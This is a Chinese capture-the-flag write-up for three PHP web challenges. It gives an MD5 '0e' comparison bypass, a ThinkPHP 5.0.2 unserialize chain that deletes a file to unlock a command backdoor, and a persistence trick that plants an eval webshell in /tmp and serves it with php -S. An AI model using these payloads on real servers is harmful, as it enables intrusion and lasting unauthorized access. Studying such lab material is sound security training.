web签到
<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {
if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {
echo "小伙子不错嘛!!flag给你了:" . $flag;
} else {
echo "偶吼,带黑阔被窝抓到了!!!!";
}
}
<?php
for($i=0;$i<10000000000000;$i++){
$str='0e'.(string)$i;
if(hash("md5",$str)==$str){
echo $str;
break;
}
}
0e215962017
eztp
<?php
namespace appindexcontroller;
class Index
{
public function index($run=[])
{
highlight_file(__FILE__);
echo '<h1>Welcome to CTFSHOW</h1></br>';
echo 'Powered by PHPthink5.0.2</br>';
echo dirname(__FILE__);
if (!empty($run[2])){
echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
}
if (!empty($run[1])){
unserialize($run[1]);
}
}
// hint:/index/index/backdoor
public function backdoor(){
if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){
echo "Try to post CMD arguments".'<br/>';
$data = input('post.');
if (!preg_match('/flag/i',$data['cmd'])){
$cmd = escapeshellarg($data['cmd']);
$cmd='cat '.$cmd;
echo $cmd;
system($cmd);
}else{
echo "No No No";
}
}else{
echo dirname(__FILE__).'/../../'."install.lock has not been deleted";
}
}
}
访问:?s=/index/index/backdoor
/var/www/html/application/index/controller/../../install.lock has not been deleted
任意文件删除poc
<?php
namespace thinkprocesspipes;
class Windows{
private $files = [];
public function __construct(){
$this->files=['/var/www/html/application/install.lock'];
}
}
echo urlencode(serialize(new Windows()));
payload
?run[]=1&run[]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Finstall.lock%22%3B%7D%7D
?s=/index/index/backdoor
cmd=/fl%81ag
不要离开我
<?php
// 题目说明:
// 想办法维持权限,确定无误后提交check,通过check后,才会生成flag,此前flag不存在
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['action'];
switch($a){
case 'cmd':
eval($_POST['cmd']);
break;
case 'check':
file_get_contents("http://checker/api/check");
break;
default:
die('params not validate');
}
- 当前目录下(
/var/www/html)无写权限 - check后会关闭nginx和php-fpm,并清空web目录(
/var/www/html)
方法一
get:/action=cmd
post:cmd=file_put_contents("/tmp/index.php","<?php eval($_POST[1]);?>");system
("sleep 5 %26%26 php -S 0.0.0.0:80 -t /tmp/");
get:/action=check
方法二
get:/action=cmd
post:cmd=system('sleep 5 %26%26 php -S 0.0.0.0:80 -t /');
get:/action=check
get:/flag_ssk.txt
方法三
cmd=system('curl http://checker/api/check;cp /f* /tmp/flag;php -S 0.0.0.0:80 -t /tmp/');
results matching ""
No results matching ""
点击蓝字 关注我们题目源码ropsten测试网络地址:https://ropsten.etherscan.io/address/0x63266aaf6bdf3076a02d49eb73ae847cfd0a945c#code思路解析此处有俩…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论